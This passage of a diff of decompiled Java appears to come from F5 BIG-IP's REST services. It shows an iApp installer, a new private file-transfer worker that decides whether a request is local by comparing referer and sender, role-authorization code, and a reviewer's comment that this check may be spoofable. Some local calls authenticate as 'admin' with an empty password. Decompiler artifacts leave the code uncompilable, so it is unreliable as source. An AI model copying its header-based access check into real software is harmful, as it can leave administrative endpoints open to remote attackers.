IAppBundleInstallTaskState.IAppBundleInstallStep.FILTER_RPMS_ON_MIN_BIGIP_VERSION_REQUIRED;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Throwable exc, ByteBuffer attachment) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to read manifest file %s - %s\", new Object[] { this.val$taskState.manifestFileName, exc.getMessage() }), RestHelper.throwableStackToString(exc));\n }\n };\n \n \n \n \n StandardOpenOption option = StandardOpenOption.READ;\n Path path = Paths.get(\"/var/config/rest/downloads/\" + taskState.manifestFileName, new String[0]);\n try {\n final AsynchronousFileChannel fileChannel = AsynchronousFileChannel.open(path, new OpenOption[] { option });\n \n ByteBuffer buffer = ByteBuffer.allocate((int)fileChannel.size());\n \n CompletionHandler<Integer, ByteBuffer> completionHandler = new CompletionHandler<Integer, ByteBuffer>()\n {\n \n public void completed(final Integer result, final ByteBuffer attachment)\n {\n RestThreadManager.getBlockingPool().execute(new Runnable()\n {\n public void run() {\n completion.completed(result, attachment);\n try {\n fileChannel.close();\n } catch (IOException e) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to close channel for manifest file %s - %s\", new Object[] { this.this$1.val$taskState.manifestFileName, e.getMessage() }), RestHelper.throwableStackToString(e));\n }\n }\n });\n }\n \n \n \n \n \n \n \n \n public void failed(final Throwable exc, final ByteBuffer attachment) {\n RestThreadManager.getBlockingPool().execute(new Runnable()\n {\n public void run() {\n completion.failed(exc, attachment);\n try {\n fileChannel.close();\n } catch (IOException e) {\n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, String.format(\"Failed to close channel for manifest file %s - %s\", new Object[] { this.this$1.val$taskState.manifestFileName, this.val$exc.getMessage() }), 
RestHelper.throwableStackToString(exc));\n }\n }\n });\n }\n };\n \n \n \n \n fileChannel.read(buffer, 0L, buffer, completionHandler);\n } catch (IOException e) {\n failTask(taskState, String.format(\"Failed to read manifest file %s - %s\", new Object[] { taskState.manifestFileName, e.getMessage() }));\n }\n }\n \n \n \n \n private void filterRpmsOnMinBigipVersionRequired(IAppBundleInstallTaskState taskState) {\n if (taskState.frameworkRpmInfo != null) {\n checkForMinBigIPVersion(taskState, taskState.frameworkRpmInfo);\n }\n for (IAppBundleInstallTaskState.RpmInfo appRpmInfo : taskState.appRpmsInfo) {\n checkForMinBigIPVersion(taskState, appRpmInfo);\n }\n if (taskState.frameworkRpmInfo != null && taskState.frameworkRpmInfo.status != IAppBundleInstallTaskState.RpmStatus.ERRORED) {\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_FRAMEWORK_RPM;\n } else if (!taskState.appRpmsInfo.isEmpty()) {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS;\n } else {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.DONE;\n }\n sendStatusUpdate(taskState);\n }\n \n \n private void checkForMinBigIPVersion(IAppBundleInstallTaskState taskState, IAppBundleInstallTaskState.RpmInfo rpmInfo) {\n for (IAppBundleInstallTaskState.Manifest.Package pkg : taskState.manifest.packages) {\n if (rpmInfo.name.contains(pkg.name)) {\n if (VersionUtil.compareVersion(this.bigIpVersion, pkg.minBigIpVersion) < 0) {\n rpmInfo.error = \"BigIP version (\" + this.bigIpVersion + \") is lower than minimum BigIP version (\" + pkg.minBigIpVersion + \") required for the iApp Rpm.\";\n \n \n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.ERRORED;\n }\n break;\n }\n }\n }\n \n \n \n private void installFrameworkRpmInBundle(IAppBundleInstallTaskState taskState) {\n IAppBundleInstallTaskState.IAppBundleInstallStep nextStep = IAppBundleInstallTaskState.IAppBundleInstallStep.UPDATE_USECASE_PACK_VERSION;\n if 
(!taskState.appRpmsInfo.isEmpty()) {\n nextStep = IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS;\n }\n installRpm(taskState.frameworkRpmInfo, taskState, nextStep);\n }\n \n \n \n private void installAppRpmsInBundle(IAppBundleInstallTaskState taskState) {\n IAppBundleInstallTaskState.RpmInfo appRpm;\n do {\n taskState.toBeInstalledAppRpmsIndex++;\n if (taskState.toBeInstalledAppRpmsIndex == taskState.appRpmsInfo.size()) {\n \n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.UPDATE_USECASE_PACK_VERSION;\n sendStatusUpdate(taskState);\n return;\n }\n appRpm = taskState.appRpmsInfo.get(taskState.toBeInstalledAppRpmsIndex);\n }\n while (appRpm.status == IAppBundleInstallTaskState.RpmStatus.ERRORED);\n \n installRpm(appRpm, taskState, IAppBundleInstallTaskState.IAppBundleInstallStep.INSTALL_APP_RPMS);\n }\n \n \n \n \n private void installRpm(final IAppBundleInstallTaskState.RpmInfo rpmInfo, final IAppBundleInstallTaskState taskState, final IAppBundleInstallTaskState.IAppBundleInstallStep nextStep) {\n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.INSTALLING;\n IAppPackageManagementTaskState packageMgmt = new IAppPackageManagementTaskState();\n packageMgmt.operation = IAppPackageManagementTaskState.IAppPackageOperation.INSTALL;\n packageMgmt.packageFilePath = \"/var/config/rest/downloads/\" + rpmInfo.name;\n \n RestRequestCompletion installCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.INSTALLED;\n taskState.step = nextStep;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n IAppPackageManagementTaskState installResponse = (IAppPackageManagementTaskState)operation.getTypedBody(IAppPackageManagementTaskState.class);\n \n String errorMessage = (installResponse != null && installResponse.errorMessage != null) ? 
installResponse.errorMessage : \"\";\n \n \n \n rpmInfo.status = IAppBundleInstallTaskState.RpmStatus.ERRORED;\n rpmInfo.error = errorMessage;\n taskState.step = nextStep;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n };\n \n RestOperation installOperation = RestOperation.create().setUri(buildLocalUri(new String[] { IAppPackageManagementTaskCollectionWorker.WORKER_URI_PATH })).setBody(packageMgmt).setCompletion((RestRequestCompletion)new TaskCompletion(getServer(), getLogger(), installCompletion));\n \n \n \n \n \n \n \n sendPost(installOperation);\n }\n \n \n \n private void updateUsecasePackVersion(final IAppBundleInstallTaskState taskState, final int retryCount) {\n RestRequestCompletion postCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation) {\n taskState.step = IAppBundleInstallTaskState.IAppBundleInstallStep.DONE;\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState);\n }\n \n \n public void failed(Exception exception, RestOperation operation) {\n if (retryCount < 5) {\n IAppBundleInstallTaskCollectionWorker.this.scheduleTaskOnce(new Runnable() {\n public void run() {\n IAppBundleInstallTaskCollectionWorker.this.sendStatusUpdate(taskState, Integer.valueOf(retryCount + 1));\n }\n }5000 * (1 << retryCount));\n } else {\n taskState.errorMessage = String.format(\"Failed to update usecase pack version: %s\", new Object[] { exception.getMessage() });\n \n \n IAppBundleInstallTaskCollectionWorker.this.failTask(taskState, taskState.errorMessage, RestHelper.throwableStackToString(exception));\n }\n }\n };\n \n \n JsonObject body = new JsonObject();\n body.addProperty(\"usecasePackVersion\", taskState.manifest.usecasePackVersion);\n \n body.addProperty(\"usecasePackBuild\", getAgcUsecasePackBuild(taskState.filePath));\n \n RestOperation postOperation = RestOperation.create().setBody(body).setBasicAuthorization(\"admin\", 
\"\").setCompletion(postCompletion).setUri(buildLocalUri(new String[] { \"/mgmt/tm/access/usecase-pack-info\" }));\n \n \n \n \n \n \n \n sendPost(postOperation);\n }\n \n \n private String getAgcUsecasePackBuild(String filePath) {\n int ind = filePath.lastIndexOf('.');\n if (ind != -1) {\n filePath = filePath.substring(0, ind);\n }\n \n ind = filePath.lastIndexOf('.');\n if (ind != -1) {\n filePath = filePath.substring(0, ind);\n }\n \n ind = filePath.lastIndexOf('-');\n if (ind == -1) {\n getLogger().info(\"Access Guided Configuration use case pack name does not contain build number\");\n return \"\";\n }\n filePath = filePath.substring(ind + 1);\n if (!Character.isDigit(filePath.charAt(0))) {\n getLogger().info(\"Access Guided Configuration use case pack name does not contain build number\");\n return \"\";\n }\n return filePath;\n }\n \n \n \n \n \n \n \n \n public void failTask(IAppBundleInstallTaskState taskState, String errorMessage, String errorDetails) {\n getLogger().severe(errorMessage + \" error details: \" + errorDetails);\n failTask(taskState, errorMessage);\n }\n }\n diff --git a/com/f5/rest/workers/FileTransferPrivateWorker.java b/com/f5/rest/workers/FileTransferPrivateWorker.java\n new file mode 100644\n index 0000000..50238b7\n --- /dev/null\n +++ b/com/f5/rest/workers/FileTransferPrivateWorker.java\n 
@@ -0,0 +1,84 @@\n +package com.f5.rest.workers;\n +\n +import com.f5.rest.common.RestLogger;\n +import com.f5.rest.common.RestOperation;\n +import com.f5.rest.workers.filemanagement.FileManagementHelper;\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +\n +public class FileTransferPrivateWorker\n + extends FileTransferWorker\n +{\n + private static final RestLogger LOGGER = new RestLogger(FileTransferPrivateWorker.class, \"\");\n +\n +\n + public FileTransferPrivateWorker(String postDirectory, String tmpDirectory) throws Exception {\n + super(postDirectory, tmpDirectory);\n + }\n +\n +\n +\n +\n +\n +\n + public FileTransferPrivateWorker(String getDirectory) throws Exception {\n + super(getDirectory);\n + }\n +\n +\n + public void onPost(RestOperation post) {\n + if (validateLocalRequest(post)) {\n + failRequest(post);\n + return;\n + }\n + super.onPost(post);\n + }\n +\n +\n + protected void onDelete(RestOperation delete) {\n + if (validateLocalRequest(delete)) {\n + failRequest(delete);\n + return;\n + }\n + super.onDelete(delete);\n + }\n +\n +\n + public void onGet(RestOperation get) {\n + if (validateLocalRequest(get)) {\n + failRequest(get);\n + return;\n + }\n + super.onGet(get);\n + }\n +\n +\n + protected void onQuery(RestOperation request) {\n + if (validateLocalRequest(request)) {\n + failRequest(request);\n + return;\n + }\n + super.onQuery(request);\n + }\n +\n + private boolean validateLocalRequest(RestOperation request) {\n + return request.getReferer().equals(request.getRemoteSender());\n + }\n +\n + private void failRequest(RestOperation post) {\n + FileManagementHelper.cleanPostForResponse(post);\n + post.setStatusCode(404);\n + post.fail(new IllegalAccessException(\"Private endpoints are not supported from remote\"));\n + }\n +}\n diff --git a/com/f5/rest/workers/RolesWorker.java b/com/f5/rest/workers/RolesWorker.java\n index 244f6d5..2ef8e3b 100644\n --- a/com/f5/rest/workers/RolesWorker.java\n +++ b/com/f5/rest/workers/RolesWorker.java\n 
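Review bot: `validateLocalRequest` in the new `FileTransferPrivateWorker` returns true when the request is to be rejected (`return request.getReferer().equals(request.getRemoteSender());`, with every handler doing `if (validateLocalRequest(post)) { failRequest(post); return; }`), so the method name reads as the opposite of its meaning; rename it to something like `isRemoteRequest`, or invert the return value and keep the name. On the same method: `getReferer()` is dereferenced without a null check, so a request carrying no referer ends in a NullPointerException instead of going through `failRequest`, and the access decision for POST, GET, DELETE and query on these private endpoints rests entirely on how `getReferer()` and `getRemoteSender()` are populated, which nothing in this file documents. Please add a class-level comment stating where both values come from and why equality means "remote", and handle null explicitly so that a missing referer or sender is rejected rather than thrown; if either value can be influenced by a client-supplied header, this comparison should not be the only control keeping these endpoints local.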
@@ -1,1375 +1,1371 @@\n package com.f5.rest.workers;\n \n import com.f5.rest.common.CompletionHandler;\n import com.f5.rest.common.RestCollectionMergeResult;\n import com.f5.rest.common.RestCollectionWorker;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestReference;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorker;\n import com.f5.rest.common.SubscriptionWorker;\n import com.f5.rest.common.UrlHelper;\n import com.f5.rest.common.WellKnownPorts;\n import com.f5.rest.workers.authn.AuthnWorker;\n import com.f5.rest.workers.authz.AuthzHelper;\n import com.f5.rest.workers.authz.EffectivePermissionsWorker;\n import com.f5.rest.workers.gossip.RemoteStateCopier;\n import java.net.URI;\n import java.util.HashSet;\n import java.util.Iterator;\n import java.util.Map;\n import java.util.Set;\n import java.util.TimerTask;\n import java.util.concurrent.ConcurrentHashMap;\n import java.util.concurrent.ConcurrentLinkedQueue;\n import java.util.concurrent.atomic.AtomicBoolean;\n \n \n \n \n \n \n \n \n \n \n \n \n \n public class RolesWorker\n extends RestCollectionWorker<RolesWorkerState, RolesCollectionState>\n implements EvaluatePermissions.Evaluate\n {\n public static final String WORKER_URI_PATH = WellKnownPorts.AUTHZ_ROLES_WORKER_URI_PATH;\n \n private static final String EXTERNAL_ROLES_WORKER_URI_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_ROLES_WORKER_URI_PATH));\n \n private static final String EXTERNAL_RESOURCE_GROUPS_WORKER_URI_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH));\n \n private static final String EXTERNAL_LOGIN_WORKER_PATH = UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(AuthnWorker.WORKER_URI_PATH));\n \n private static final String EXTERNAL_EFFECTIVE_PERMISSIONS_WORKER_PATH = 
UrlHelper.normalizeUriPath(UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_EFFECTIVE_PERMISSIONS_WORKER_URI_PATH));\n \n public static final String ADMIN_ROLE = \"Administrator\";\n \n public static final String ADMIN_ROLE_DESCRIPTION = \"Administrators are able to perform any action.\";\n public static final String READ_ONLY_MSG_FMT = \"Cannot %s built in roles.\";\n private static final String LOCAL_USERS_PATH = UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH);\n \n \n private final Map<String, RoleResourceMatcher> roleNameToResources = new ConcurrentHashMap<>();\n private final Map<RestReference, Set<String>> resourceGroupToRoleNames = new ConcurrentHashMap<>();\n private final Map<RestReference, Set<String>> userLinkToRoleNames = new ConcurrentHashMap<>();\n \n \n \n private TmosRoleCache tmosRoleCache;\n \n \n ConcurrentLinkedQueue<RestReference> usersToRemove = new ConcurrentLinkedQueue<>();\n AtomicBoolean isUserRemovalRunning = new AtomicBoolean();\n \n private final RoleResourceGroupWorker resourcesGroupWorker;\n private final EffectivePermissionsWorker effectivePermissionsWorker;\n \n public RolesWorker() {\n super(RolesWorkerState.class, RolesCollectionState.class);\n this.resourcesGroupWorker = new RoleResourceGroupWorker(this);\n this.effectivePermissionsWorker = new EffectivePermissionsWorker(this);\n }\n \n \n \n \n \n public void onStart(RestServer server) throws Exception {\n EvaluatePermissions.setRolesWorker(this, server.getPort());\n \n this.tmosRoleCache = new TmosRoleCache(server.getPort());\n setIdempotentPostEnabled(true);\n setFullStateRequiredOnStart(true);\n setMaxPendingOperations(10000L);\n \n URI subscriptionsUri = makeLocalUri(SubscriptionWorker.ALREADY_STARTED_WORKER_URI_PATH);\n URI publicationsUri = makeLocalUri(\"shared/publisher\");\n URI tmosRoleUri = makeLocalUri(TmosRoleWorkerState.WORKER_PATH);\n URI localRolesUri = makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH);\n \n URI resourceGroupWorkerUri = 
getServer().registerWorkerUri(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH, (RestWorker)this.resourcesGroupWorker);\n \n \n URI effectivePermissionWorkerUri = getServer().registerWorkerUri(WellKnownPorts.AUTHZ_EFFECTIVE_PERMISSIONS_WORKER_URI_PATH, (RestWorker)this.effectivePermissionsWorker);\n \n \n \n completeStart(this.collectionClass, new URI[] { resourceGroupWorkerUri, effectivePermissionWorkerUri, tmosRoleUri, localRolesUri, subscriptionsUri, publicationsUri });\n }\n \n \n \n \n \n protected void onStartCompleted(Object loadedState, Exception stateLoadEx, Exception availabilityEx) throws Exception {\n RolesCollectionState collectionState = (RolesCollectionState)loadedState;\n \n for (RolesWorkerState role : collectionState.items) {\n addRole(role);\n }\n \n \n \n RestRequestCompletion notificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n if (operation.getMethod() != RestOperation.RestMethod.DELETE) {\n return;\n }\n \n RestResolverGroupEntry entry = (RestResolverGroupEntry)operation.getTypedBody(RestResolverGroupEntry.class);\n for (RestReference ref : entry.references) {\n RolesWorker.this.queueUserRemoval(ref);\n }\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RolesWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestRequestCompletion subscribeCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to subscribe to worker: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n public void completed(RestOperation operation) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully subscribed to %s\", new Object[] { operation.getUri().getPath() });\n }\n };\n \n AuthzHelper.subscribeToUsers(getServer(), subscribeCompletion, notificationCompletion);\n \n AuthzHelper.subscribeToUserGroups(getServer(), 
subscribeCompletion, notificationCompletion);\n \n \n \n \n \n RestRequestCompletion resourceGroupNotificationCompletion = new RestRequestCompletion()\n {\n public void completed(RestOperation operation)\n {\n if (operation.getMethod() != RestOperation.RestMethod.DELETE) {\n return;\n }\n RoleResourceGroupState groupState = (RoleResourceGroupState)operation.getTypedBody(RoleResourceGroupState.class);\n \n RolesWorker.this.removeResourceGroupsFromRoles(new RestReference(groupState.selfLink));\n }\n \n \n public void failed(Exception ex, RestOperation operation) {\n RolesWorker.this.getLogger().severeFmt(\"%s\", new Object[] { ex.getMessage() });\n }\n };\n \n \n RestOperation subscribeRequest = RestOperation.create().setUri(buildLocalUri(new String[] { WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH })).setCompletion(subscribeCompletion);\n \n \n \n sendPostForSubscription(subscribeRequest, getServer(), resourceGroupNotificationCompletion);\n \n \n \n super.onStartCompleted(loadedState, stateLoadEx, availabilityEx);\n \n removeStaleResourceGroups(collectionState);\n }\n \n \n \n \n \n \n \n \n \n \n private void removeStaleResourceGroups(final RolesCollectionState rolesCollection) {\n RestRequestCompletion getCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to clean up stale resource groups: %s\", new Object[] { RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n RoleResourceGroupCollection groupCollection = (RoleResourceGroupCollection)operation.getTypedBody(RoleResourceGroupCollection.class);\n \n \n Set<URI> groupUris = new HashSet<>();\n for (RoleResourceGroupState group : groupCollection.items) {\n groupUris.add(group.selfLink);\n }\n \n for (RolesWorkerState role : rolesCollection.items) {\n boolean needsUpdate = false;\n if (role.resourceGroupReferences != null) {\n 
Iterator<RestReference> iter = role.resourceGroupReferences.iterator();\n while (iter.hasNext()) {\n if (!groupUris.contains(((RestReference)iter.next()).link)) {\n iter.remove();\n needsUpdate = true;\n }\n }\n }\n \n if (needsUpdate) {\n RolesWorker.this.putRole(role);\n }\n }\n }\n };\n \n \n RestOperation get = RestOperation.create().setUri(makeLocalUri(WellKnownPorts.AUTHZ_RESOURCE_GROUPS_WORKER_URI_PATH)).setCompletion(getCompletion);\n \n \n sendGet(get);\n }\n \n private void putRole(final RolesWorkerState role) {\n RestRequestCompletion updateCompletion = new RestRequestCompletion()\n {\n public void failed(Exception ex, RestOperation operation)\n {\n RolesWorker.this.getLogger().warningFmt(\"Failed to update role %s: %s\", new Object[] { this.val$role.name, RestHelper.throwableStackToString(ex) });\n }\n \n \n \n \n public void completed(RestOperation operation) {\n RolesWorker.this.getLogger().fineFmt(\"Successfully update role: %s\", new Object[] { this.val$role.name });\n }\n };\n \n \n RestOperation op = RestOperation.create().setUri(makeLocalUri(role.selfLink)).setBody(role).setCompletion(updateCompletion);\n \n sendPut(op);\n }\n \n \n public void onGet(final RestOperation request) {\n final String destinationRoleName = getItemIdFromRequest(request);\n \n \n \n \n \n \n \n \n \n \n \n \n RestReference userReference = request.getAuthUserReference();\n if (userReference == null || AuthzHelper.isDefaultAdminRef(userReference)) {\n super.onGet(request);\n \n return;\n }\n hasAdminRole(request, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n RolesWorker.this.onGet(request);\n \n return;\n }\n if (RolesWorker.this.hasVisibilityToRole(request, destinationRoleName)) {\n RolesWorker.this.onGet(request);\n \n return;\n }\n if (destinationRoleName != null) {\n \n String error = String.format(\"Authorization failed: userReference [%s] is not a member of role [%s].\", new 
Object[] { (this.val$request.getAuthUserReference()).link, this.val$destinationRoleName });\n \n \n request.setStatusCode(401);\n request.fail(new SecurityException(error));\n \n return;\n }\n RolesWorker.this.onGet(request);\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n RolesWorker.failWithPermissionsInternalError(request);\n }\n });\n }\n \n \n private boolean hasVisibilityToRole(RestOperation request, String destinationRoleName) {\n for (RestReference identityRef : request.getAuthIdentityReferences()) {\n \n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(identityRef)) {\n continue;\n }\n \n synchronized (this.userLinkToRoleNames) {\n Set<String> roleNames = this.userLinkToRoleNames.get(identityRef);\n \n \n if (roleNames.contains(destinationRoleName)) {\n return true;\n }\n \n \n for (String roleName : roleNames) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n String destinationRoleUriPath = (destinationRoleName == null) ? EXTERNAL_ROLES_WORKER_URI_PATH : UrlHelper.buildUriPath(new String[] { EXTERNAL_ROLES_WORKER_URI_PATH, destinationRoleName });\n \n \n if (resources.verifyResourceIsPermitted(destinationRoleUriPath, RestOperation.RestMethod.GET)) {\n return true;\n }\n }\n }\n }\n \n return false;\n }\n \n \n public boolean hasVisibilityToResourceGroup(RestOperation request, RestReference resourceGroupRef) {\n for (RestReference identityRef : request.getAuthIdentityReferences()) {\n \n \n \n \n \n if (!this.userLinkToRoleNames.containsKey(identityRef)) {\n continue;\n }\n \n synchronized (this.userLinkToRoleNames) {\n \n Set<String> roleNames = this.userLinkToRoleNames.get(identityRef);\n \n \n if (null == roleNames || roleNames.isEmpty()) {\n continue;\n }\n \n \n Set<String> rolesWithResourceGroup = this.resourceGroupToRoleNames.get(resourceGroupRef);\n if (null != rolesWithResourceGroup) {\n for (String roleName : rolesWithResourceGroup) {\n if (roleNames.contains(roleName)) {\n return true;\n }\n }\n 
}\n \n \n for (String roleName : roleNames) {\n RoleResourceMatcher resources = this.roleNameToResources.get(roleName);\n if (resources.verifyResourceIsPermitted(resourceGroupRef.link.getPath(), RestOperation.RestMethod.GET)) {\n return true;\n }\n }\n }\n }\n \n return false;\n }\n \n \n \n \n \n \n \n \n \n \n \n \n \n public void setGetCollectionBodyAsync(RestOperation getRequest, RestOperation loadRequest, CompletionHandler<Void> completion) {\n String destinationRoleName = getItemIdFromRequest(getRequest);\n if (destinationRoleName == null || destinationRoleName.equals(\"Administrator\")) {\n getBuiltInRoleUserReferences(getRequest, loadRequest, completion);\n } else {\n continueSetGetCollectionBody(getRequest, loadRequest, completion);\n }\n }\n \n \n private void getBuiltInRoleUserReferences(final RestOperation getRequest, final RestOperation loadRequest, final CompletionHandler<Void> finalCompletion) {\n final String roleName = getItemIdFromRequest(getRequest);\n RestRequestCompletion completion = new RestRequestCompletion()\n {\n public void completed(RestOperation response)\n {\n RolesWorker.populateAdminUserReferencesOnGet(roleName, loadRequest, response);\n RolesWorker.this.continueSetGetCollectionBody(getRequest, loadRequest, finalCompletion);\n }\n \n \n \n public void failed(Exception ex, RestOperation response) {\n RolesWorker.this.getLogger().fineFmt(\"Unable to get list of admins/non-admins: %s\", new Object[] { ex.getMessage() });\n \n getRequest.fail(ex);\n }\n };\n \n \n RestOperation request = RestOperation.create().setUri(makeLocalUri(TmosLocalRolesWorkerState.WORKER_PATH)).setAdminIdentity().setCompletion(completion);\n \n \n \n \n sendGet(request);\n }\n \n \n static void populateAdminUserReferencesOnGet(String destinationRole, RestOperation request, RestOperation LocalRolesResponse) {\n RolesCollectionState collection = null;\n RolesWorkerState adminRole = null;\n \n if (destinationRole == null) {\n collection = 
(RolesCollectionState)request.getTypedBody(RolesCollectionState.class);\n for (RolesWorkerState role : collection.items) {\n if (\"Administrator\".equals(role.name)) {\n adminRole = role;\n }\n }\n } else if (destinationRole.equals(\"Administrator\")) {\n adminRole = (RolesWorkerState)request.getTypedBody(RolesWorkerState.class);\n }\n \n String localUsersPath = UrlHelper.makePublicPath(WellKnownPorts.AUTHZ_USERS_WORKER_URI_PATH);\n TmosLocalRolesWorkerState localState = (TmosLocalRolesWorkerState)LocalRolesResponse.getTypedBody(TmosLocalRolesWorkerState.class);\n \n \n if (adminRole != null) {\n if (adminRole.userReferences == null) {\n adminRole.userReferences = new HashSet<>();\n }\n \n \n \n Iterator<RestReference> it = adminRole.userReferences.iterator();\n while (it.hasNext()) {\n RestReference userRef = it.next();\n if (userRef.link.getPath().startsWith(localUsersPath)) {\n it.remove();\n }\n }\n \n \n for (String user : localState.administrators) {\n String userPath = UrlHelper.buildUriPath(new String[] { localUsersPath, user });\n \n adminRole.userReferences.add(new RestReference(UrlHelper.buildPublicUri(userPath)));\n }\n \n if (adminRole.userReferences.isEmpty()) {\n adminRole.userReferences = null;\n }\n }\n \n if (destinationRole == null) {\n request.setBody(collection);\n } else if (destinationRole.equals(\"Administrator\")) {\n request.setBody(adminRole);\n }\n }\n \n \n \n private void continueSetGetCollectionBody(final RestOperation getRequest, final RestOperation loadRequest, final CompletionHandler<Void> completion) {\n String destinationRoleName = getItemIdFromRequest(getRequest);\n if (destinationRoleName != null) {\n super.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n \n return;\n }\n \n RestReference userReference = getRequest.getAuthUserReference();\n if (userReference == null || AuthzHelper.isDefaultAdminRef(userReference)) {\n super.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n \n return;\n }\n 
\n hasAdminRole(getRequest, new CompletionHandler<Boolean>()\n {\n public void completed(Boolean isAdmin)\n {\n if (isAdmin != null && isAdmin.booleanValue()) {\n RolesWorker.this.setGetCollectionBodyAsync(getRequest, loadRequest, completion);\n \n return;\n }\n getRequest.setBody(RolesWorker.this.filterRoles(getRequest, loadRequest));\n completion.completed(null);\n }\n \n \n public void failed(Exception ex, Boolean isAdmin) {\n getRequest.setBody(null);\n getRequest.setStatusCode(500);\n completion.failed(new Exception(\"Internal server error while authorizing request\"), null);\n }\n });\n }\n \n \n \n private RolesCollectionState filterRoles(RestOperation getRequest, RestOperation loadRequest) {\n RolesCollectionState roles = (RolesCollectionState)loadRequest.getTypedBody(RolesCollectionState.class);\n Iterator<RolesWorkerState> iter = roles.items.iterator();\n while (iter.hasNext()) {\n if (!hasVisibilityToRole(getRequest, ((RolesWorkerState)iter.next()).name)) {\n iter.remove();\n }\n }\n return roles;\n }\n \n \n protected void onPatch(RestOperation request) {\n getLogger().fineFmt(\"Attempting to PATCH role; uri: %s, referrer: %s\", new Object[] { request.getUri(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n \n RestCollectionMergeResult<RolesWorkerState> mergeResult = getMergeResultFromRequest(request);\n \n \n if (((RolesWorkerState)mergeResult.clientState).userReferences != null && ((RolesWorkerState)mergeResult.storageState).userReferences != null)\n {\n ((RolesWorkerState)mergeResult.mergedState).userReferences.addAll(((RolesWorkerState)mergeResult.storageState).userReferences);\n }\n if (((RolesWorkerState)mergeResult.clientState).resourceGroupReferences != null && ((RolesWorkerState)mergeResult.storageState).resourceGroupReferences != null)\n {\n ((RolesWorkerState)mergeResult.mergedState).resourceGroupReferences.addAll(((RolesWorkerState)mergeResult.storageState).resourceGroupReferences);\n }\n \n if 
(((RolesWorkerState)mergeResult.clientState).resources != null && ((RolesWorkerState)mergeResult.storageState).resources != null) {\n ((RolesWorkerState)mergeResult.mergedState).resources.addAll(((RolesWorkerState)mergeResult.storageState).resources);\n }\n if (((RolesWorkerState)mergeResult.clientState).properties != null && ((RolesWorkerState)mergeResult.storageState).properties != null)\n {\n for (Map.Entry<String, Object> entry : ((RolesWorkerState)mergeResult.storageState).properties.entrySet()) {\n if (!((RolesWorkerState)mergeResult.mergedState).properties.containsKey(entry.getKey())) {\n ((RolesWorkerState)mergeResult.mergedState).properties.put(entry.getKey(), entry.getValue());\n }\n }\n }\n \n request.setBody(mergeResult.mergedState);\n updateBuiltInRoleCacheOnDemand(request);\n }\n \n \n public void onPatchCompleted(RestOperation request) {\n RolesWorkerState patchState = (RolesWorkerState)getStateFromRequest(request);\n addRole(patchState);\n request.complete();\n }\n \n \n protected void onPut(RestOperation request) {\n getLogger().fineFmt(\"Attempting to PUT role; uri: %s, referrer: %s\", new Object[] { request.getUri().toString(), request.getReferer() });\n \n if (isReadOnly(request)) {\n return;\n }\n updateBuiltInRoleCacheOnDemand(request);\n }\n \n private RolesWorkerState getStateToUpdate(RestOperation request) {\n if (request.getMethod().equals(RestOperation.RestMethod.PATCH)) {\n RestCollectionMergeResult<RolesWorkerState> mergeResult = getMergeResultFromRequest(request);\n \n return (RolesWorkerState)mergeResult.storageState;\n }\n return (RolesWorkerState)request.getTypedBody(RolesWorkerState.class);\n }\n \n private void updateBuiltInRoleCacheOnDemand(RestOperation incomingRequest) {\n RolesWorkerState role = (RolesWorkerState)incomingRequest.getTypedBody(RolesWorkerState.class);\n \n if (role.userReferences != null &&\n \"Administrator\".equals(role.name)) {\n updateLocalRolesWorker(incomingRequest, role);\n \n 